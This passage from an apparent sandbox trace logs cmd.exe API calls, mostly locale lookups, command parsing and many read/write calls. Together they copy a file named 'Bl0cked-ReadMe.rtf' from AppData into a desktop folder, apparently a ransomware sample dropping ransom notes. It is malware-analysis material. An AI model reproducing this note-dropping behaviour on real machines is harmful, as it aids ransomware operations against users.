GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f898, cchData=128 | out: 
lpLCData="0") returned 2 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f898, cchData=128 | out: lpLCData="1") returned 2 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0134.330] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0134.330] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0134.331] GetConsoleTitleW (in: lpConsoleTitle=0x1d08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.331] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0134.332] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0134.332] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0134.332] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0134.332] _wcsicmp 
(_String1="type", _String2=")") returned 75 [0134.332] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0134.333] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0134.333] _wcsicmp (_String1="IF", _String2="type") returned -11 [0134.333] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0134.333] _wcsicmp (_String1="REM", _String2="type") returned -2 [0134.333] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0134.337] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.337] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.337] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.337] GetFileType (hFile=0x7) returned 0x2 [0134.397] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0134.397] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f790 | out: lpMode=0x16f790) returned 1 [0134.397] _dup (_FileHandle=1) returned 3 [0134.397] _close (_FileHandle=1) returned 0 [0134.397] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0134.397] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x16f760, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0134.399] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0134.399] GetConsoleTitleW (in: lpConsoleTitle=0x16f590, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.399] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0134.399] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0134.399] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0134.399] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0134.400] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 
[0134.400] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x16f0f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f0f4) returned 0x1d0e88 [0134.400] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0134.400] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0134.400] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0134.401] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16e000, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0134.401] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0134.401] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.401] GetFileType (hFile=0x54) returned 0x1 [0134.401] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.401] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x16e058 | out: lpFileSizeHigh=0x16e058*=0x0) returned 0x1632 [0134.401] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.401] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.401] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.401] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.401] GetFileType (hFile=0x4c) returned 0x1 [0134.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.401] GetFileType (hFile=0x4c) returned 0x1 [0134.401] _get_osfhandle (_FileHandle=1) returned 
0x4c [0134.401] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] GetFileType (hFile=0x4c) returned 0x1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] GetFileType (hFile=0x4c) returned 0x1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] GetFileType (hFile=0x4c) returned 0x1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] GetFileType (hFile=0x4c) returned 0x1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] GetFileType (hFile=0x4c) returned 0x1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] WriteFile (in: 
hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.403] GetFileType (hFile=0x4c) returned 0x1 [0134.403] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.404] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.404] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.404] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.404] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] GetFileType (hFile=0x4c) returned 0x1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] GetFileType (hFile=0x4c) returned 0x1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] GetFileType (hFile=0x4c) returned 0x1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.404] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0134.404] GetFileType (hFile=0x4c) returned 0x1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] GetFileType (hFile=0x4c) returned 0x1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.404] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.404] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] GetFileType (hFile=0x4c) returned 0x1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] GetFileType (hFile=0x4c) returned 0x1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] GetFileType (hFile=0x4c) returned 0x1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.405] _get_osfhandle (_FileHandle=4) returned 0x54 
[0134.405] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.405] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.405] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] GetFileType (hFile=0x4c) returned 0x1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] GetFileType (hFile=0x4c) returned 0x1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] GetFileType (hFile=0x4c) returned 0x1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.405] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] GetFileType (hFile=0x4c) returned 0x1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] GetFileType (hFile=0x4c) returned 0x1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, 
lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] GetFileType (hFile=0x4c) returned 0x1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] GetFileType (hFile=0x4c) returned 0x1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] GetFileType (hFile=0x4c) returned 0x1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.406] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.406] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.406] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.406] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.406] GetFileType (hFile=0x4c) returned 0x1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] GetFileType (hFile=0x4c) returned 0x1 [0134.407] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] GetFileType (hFile=0x4c) returned 0x1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] GetFileType (hFile=0x4c) returned 0x1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] GetFileType (hFile=0x4c) returned 0x1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] GetFileType (hFile=0x4c) returned 0x1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] GetFileType (hFile=0x4c) returned 0x1 [0134.407] _get_osfhandle (_FileHandle=1) returned 
0x4c [0134.407] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.407] GetFileType (hFile=0x4c) returned 0x1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.408] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.408] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.408] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.408] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] GetFileType (hFile=0x4c) returned 0x1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] GetFileType (hFile=0x4c) returned 0x1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] GetFileType (hFile=0x4c) returned 0x1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) 
returned 1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] GetFileType (hFile=0x4c) returned 0x1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] GetFileType (hFile=0x4c) returned 0x1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.408] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.408] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] GetFileType (hFile=0x4c) returned 0x1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] GetFileType (hFile=0x4c) returned 0x1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] GetFileType (hFile=0x4c) returned 0x1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] WriteFile (in: hFile=0x4c, lpBuffer=0x16f070*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f070*, lpNumberOfBytesWritten=0x16e074*=0x20, lpOverlapped=0x0) returned 1 [0134.409] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0134.409] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e060 | out: lpNewFilePointer=0x0) returned 1 [0134.409] _get_osfhandle (_FileHandle=4) returned 0x54 [0134.409] ReadFile (in: hFile=0x54, lpBuffer=0x16ee90, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e080, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesRead=0x16e080*=0x200, lpOverlapped=0x0) returned 1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] GetFileType (hFile=0x4c) returned 0x1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] GetFileType (hFile=0x4c) returned 0x1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ee90*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] GetFileType (hFile=0x4c) returned 0x1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.409] WriteFile (in: hFile=0x4c, lpBuffer=0x16eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16eee0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.409] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] GetFileType (hFile=0x4c) returned 0x1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef30*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] GetFileType (hFile=0x4c) returned 0x1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef80*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16ef80*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] GetFileType (hFile=0x4c) returned 0x1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] WriteFile (in: hFile=0x4c, lpBuffer=0x16efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16efd0*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] GetFileType (hFile=0x4c) returned 0x1 [0134.410] _get_osfhandle (_FileHandle=1) returned 0x4c [0134.410] WriteFile (in: hFile=0x4c, lpBuffer=0x16f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e074, lpOverlapped=0x0 | out: lpBuffer=0x16f020*, lpNumberOfBytesWritten=0x16e074*=0x50, lpOverlapped=0x0) returned 1 [0134.410] 